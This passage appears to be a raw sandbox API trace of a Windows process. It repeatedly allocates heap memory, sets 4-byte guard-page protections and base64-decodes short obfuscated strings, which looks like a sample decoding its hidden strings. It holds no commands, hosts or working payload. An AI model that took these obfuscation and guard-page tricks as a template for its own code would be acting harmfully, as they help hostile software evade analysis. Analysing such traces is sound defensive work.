Size=0x104) returned 0x5c0108 [0181.142] VirtualProtect (in: lpAddress=0x5c0108, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5beb08 [0181.142] CryptStringToBinaryA (in: pszString="bR2dVfqXDmBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] CryptStringToBinaryA (in: pszString="bR2dVfqXDmBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0e28 [0181.142] VirtualProtect (in: lpAddress=0x5c0e28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.142] GetProcessHeap () returned 0x5b0000 [0181.142] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5be9d0 [0181.143] CryptStringToBinaryA (in: pszString="bR2UTvfUVWBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] CryptStringToBinaryA (in: pszString="bR2UTvfUVWBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] GetProcessHeap () returned 0x5b0000 [0181.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf3e8 [0181.143] VirtualProtect (in: lpAddress=0x5bf3e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.143] GetProcessHeap () returned 0x5b0000 [0181.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5be9e8 [0181.143] CryptStringToBinaryA (in: pszString="eRGYUveSFGBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] CryptStringToBinaryA (in: pszString="eRGYUveSFGBFMSo=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] GetProcessHeap () returned 0x5b0000 [0181.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0220 [0181.143] VirtualProtect (in: lpAddress=0x5c0220, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.143] GetProcessHeap () returned 0x5b0000 [0181.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5beb38 [0181.143] CryptStringToBinaryA (in: pszString="cRmUEanJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] CryptStringToBinaryA (in: pszString="cRmUEanJAyJN", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.143] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0ae0 [0181.144] VirtualProtect (in: lpAddress=0x5c0ae0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.144] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bea00 [0181.144] CryptStringToBinaryA (in: pszString="XQeUQ++CISdNOAc=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.144] CryptStringToBinaryA (in: pszString="XQeUQ++CISdNOAc=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.144] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf1b8 [0181.144] VirtualProtect (in: lpAddress=0x5bf1b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.144] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bea48 [0181.144] CryptStringToBinaryA (in: pszString="SQeYVv6hDiJE", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.144] CryptStringToBinaryA (in: pszString="SQeYVv6hDiJE", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.144] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0bf8 [0181.144] VirtualProtect (in: lpAddress=0x5c0bf8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.144] GetProcessHeap () returned 0x5b0000 [0181.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5beb50 [0181.144] CryptStringToBinaryA (in: pszString="XRmeUf6vBiBFMSM=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] CryptStringToBinaryA (in: pszString="XRmeUf6vBiBFMSM=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0d10 [0181.145] VirtualProtect (in: lpAddress=0x5c0d10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5beb68 [0181.145] CryptStringToBinaryA (in: pszString="WRCFZPKLAh1IJyM=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] CryptStringToBinaryA (in: pszString="WRCFZPKLAh1IJyM=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf2d0 [0181.145] VirtualProtect (in: lpAddress=0x5bf2d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5beb80 [0181.145] CryptStringToBinaryA (in: pszString="cgaFUPeCCQ8=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] CryptStringToBinaryA (in: pszString="cgaFUPeCCQ8=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfb90 [0181.145] VirtualProtect (in: lpAddress=0x5bfb90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.145] GetProcessHeap () returned 0x5b0000 [0181.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bebb0 [0181.146] CryptStringToBinaryA (in: pszString="UhqSQ/emCyJOPg==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.146] CryptStringToBinaryA (in: pszString="UhqSQ/emCyJOPg==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.146] GetProcessHeap () returned 0x5b0000 [0181.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfa78 [0181.146] VirtualProtect (in: lpAddress=0x5bfa78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.146] GetProcessHeap () returned 0x5b0000 [0181.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5bec88 [0181.146] CryptStringToBinaryA (in: pszString="WRmeQPqLITxEOA==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.146] CryptStringToBinaryA (in: pszString="WRmeQPqLITxEOA==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.146] GetProcessHeap () returned 0x5b0000 [0181.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf500 [0181.146] VirtualProtect (in: lpAddress=0x5bf500, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.147] GetProcessHeap () returned 0x5b0000 [0181.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5beca0 [0181.147] CryptStringToBinaryA (in: pszString="TBCQRt2OCys=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.147] CryptStringToBinaryA (in: pszString="TBCQRt2OCys=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.147] GetProcessHeap () returned 0x5b0000 [0181.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bf618 [0181.147] VirtualProtect (in: lpAddress=0x5bf618, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.147] GetProcessHeap () returned 0x5b0000 [0181.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5becb8 [0181.147] CryptStringToBinaryA (in: pszString="UQWUTMuVCC1ELjU=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.147] CryptStringToBinaryA (in: pszString="UQWUTMuVCC1ELjU=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.147] GetProcessHeap () returned 0x5b0000 [0181.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bfca8 [0181.147] VirtualProtect (in: lpAddress=0x5bfca8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.147] GetProcessHeap () returned 0x5b0000 [0181.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bec70 [0181.152] CryptStringToBinaryA (in: pszString="TRCFZPKLAh5ONCjieNs=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.152] CryptStringToBinaryA (in: pszString="TRCFZPKLAh5ONCjieNs=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.152] GetProcessHeap () returned 0x5b0000 [0181.152] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c10d0 [0181.152] VirtualProtect (in: lpAddress=0x5c10d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.152] GetProcessHeap () returned 0x5b0000 [0181.152] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5bec40 [0181.153] CryptStringToBinaryA (in: pszString="TRCFZ/WDKChnNCrz", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] CryptStringToBinaryA (in: pszString="TRCFZ/WDKChnNCrz", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2c28 [0181.153] VirtualProtect (in: lpAddress=0x5c2c28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5becd0 [0181.153] CryptStringToBinaryA (in: pszString="WRCFYe6VFStPKRbkcsrJKSgQLg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] CryptStringToBinaryA (in: pszString="WRCFYe6VFStPKRbkcsrJKSgQLg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1f08 [0181.153] VirtualProtect (in: lpAddress=0x5c1f08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5bc870 [0181.153] CryptStringToBinaryA (in: pszString="WRCFbvSEBiJ1NCvz", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] CryptStringToBinaryA (in: pszString="WRCFbvSEBiJ1NCvz", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1648 [0181.153] VirtualProtect (in: lpAddress=0x5c1648, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.153] GetProcessHeap () returned 0x5b0000 [0181.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5bece8 [0181.153] CryptStringToBinaryA (in: pszString="WRCFdvKKAhROMyPfc8/DKDY4PtLC2g==", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] CryptStringToBinaryA (in: pszString="WRCFdvKKAhROMyPfc8/DKDY4PtLC2g==", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1aa8 [0181.154] VirtualProtect (in: lpAddress=0x5c1aa8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5bc810 [0181.154] CryptStringToBinaryA (in: pszString="WRCFd+iCFQpEOyfjcd3gNTg4Jt7j1QTR", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] CryptStringToBinaryA (in: pszString="WRCFd+iCFQpEOyfjcd3gNTg4Jt7j1QTR", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2b10 [0181.154] VirtualProtect (in: lpAddress=0x5c2b10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x19) returned 0x5c2f98 [0181.154] CryptStringToBinaryA (in: pszString="UhqSQ/ehFStE", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] CryptStringToBinaryA (in: pszString="UhqSQ/ehFStE", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1300 [0181.154] VirtualProtect (in: lpAddress=0x5c1300, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.154] GetProcessHeap () returned 0x5b0000 [0181.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5bec28 [0181.154] CryptStringToBinaryA (in: pszString="WRCFceKUEytMDSnheNv/LjotP8g=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c0fb8 [0181.155] VirtualProtect (in: lpAddress=0x5c0fb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc670 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c28e0 [0181.155] VirtualProtect (in: lpAddress=0x5c28e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5bec58 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1df0 [0181.155] VirtualProtect (in: lpAddress=0x5c1df0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc7d0 [0181.155] GetProcessHeap () returned 0x5b0000 [0181.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1418 [0181.155] VirtualProtect (in: lpAddress=0x5c1418, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5bc830 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c27c8 [0181.156] VirtualProtect (in: lpAddress=0x5c27c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5c3110 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c26b0 [0181.156] VirtualProtect (in: lpAddress=0x5c26b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5c3158 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1cd8 [0181.156] VirtualProtect (in: lpAddress=0x5c1cd8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5c3188 [0181.156] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1530 [0181.157] VirtualProtect (in: lpAddress=0x5c1530, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3200 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1760 [0181.157] VirtualProtect (in: lpAddress=0x5c1760, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5bc550 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2d40 [0181.157] VirtualProtect (in: lpAddress=0x5c2d40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5c3218 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2e58 [0181.157] VirtualProtect (in: lpAddress=0x5c2e58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3260 [0181.157] GetProcessHeap () returned 0x5b0000 [0181.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2020 [0181.158] VirtualProtect (in: lpAddress=0x5c2020, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: 